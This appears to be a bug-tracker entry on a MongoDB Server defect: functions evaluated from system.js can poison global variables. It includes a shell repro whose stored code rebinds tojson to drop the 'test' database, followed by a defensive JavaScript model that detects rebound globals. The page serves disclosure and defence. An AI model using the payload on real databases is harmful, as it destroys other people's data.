BugZero found this defect 17 days ago.
5/2/2024
MongoDB Server
No affected releases provided.
No fixed releases provided.
Evaluation of JavaScript statements to produce functions from system.js can still have side effects. The Mongo object isn't loaded at the time they are executed, but they can still poison global variables.

MongoDB Enterprise > db.col.insert({data: 5})
WriteResult({ "nInserted" : 1 })
MongoDB Enterprise > db.system.js.save({_id: "foo", value: Code("function() {this.tojson = function() {(new this.Mongo).getDB(\"test\").dropDatabase()}}(), function(){return function() {return 5;}}()")})
WriteResult({ "nMatched" : 0, "nUpserted" : 1, "nModified" : 0, "_id" : "foo" })
MongoDB Enterprise > db.eval("foo")
WARNING: db.eval is deprecated
{ "code" : "function () {return 5;}" }
MongoDB Enterprise > db.eval("tojson")
WARNING: db.eval is deprecated
{ "code" : "function () {(new this.Mongo).getDB(\"test\").dropDatabase()}" }
MongoDB Enterprise > db.eval("tojson(5)")
WARNING: db.eval is deprecated
null
MongoDB Enterprise > db.col.count()
0

See the original ticket SECURITY-470 for additional context and history.
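
A plain-JavaScript model of the behaviour described above, added here as an example and not code from MongoDB or from the ticket: it evaluates system.js-style values, compares the global object before and after each one to flag entries that rebind globals, and then restores them. The helper names, the sample documents and the harmless "poisoned" replacement body are constructed for illustration.

```javascript
// Stand-in for a shell helper that later code relies on (assumption: not MongoDB's tojson).
globalThis.tojson = function tojson(v) { return JSON.stringify(v); };

// Constructed system.js-style documents. "foo" has the shape shown in the ticket, with a
// harmless replacement body in place of the dropDatabase() call.
const storedDocs = [
  { _id: "five", value: "function() { return 5; }" },
  { _id: "foo", value: 'function() { this.tojson = function() { return "poisoned"; }; }(), ' +
                       "function() { return function() { return 5; }; }()" },
];

// Record every own property descriptor of the global object without invoking getters.
function snapshotGlobals() {
  const snap = new Map();
  for (const name of Object.getOwnPropertyNames(globalThis)) {
    snap.set(name, Object.getOwnPropertyDescriptor(globalThis, name));
  }
  return snap;
}

// Names added or rebound since the snapshot (Object.is so that NaN compares equal).
function changedGlobals(before) {
  return Object.getOwnPropertyNames(globalThis).filter((name) => {
    const was = before.get(name);
    const now = Object.getOwnPropertyDescriptor(globalThis, name);
    return !was || !Object.is(was.value, now.value) || was.get !== now.get || was.set !== now.set;
  });
}

// Evaluate one stored value as an expression that yields a function, report which
// globals the evaluation touched, then put the original bindings back.
function loadStored(doc) {
  const before = snapshotGlobals();
  const fn = (0, eval)("(" + doc.value + ")"); // indirect eval: sloppy-mode global code
  const poisoned = changedGlobals(before);
  for (const name of poisoned) {
    const was = before.get(name);
    if (was) Object.defineProperty(globalThis, name, was);
    else delete globalThis[name];
  }
  return { id: doc._id, fn, poisoned };
}

const report = storedDocs.map(loadStored);
for (const r of report) {
  console.log(r.id, "returns", r.fn(), "| globals rebound during load:", r.poisoned);
}
```

Both entries yield a function returning 5, so checking only the returned function does not distinguish them; the difference shows up only in the global diff.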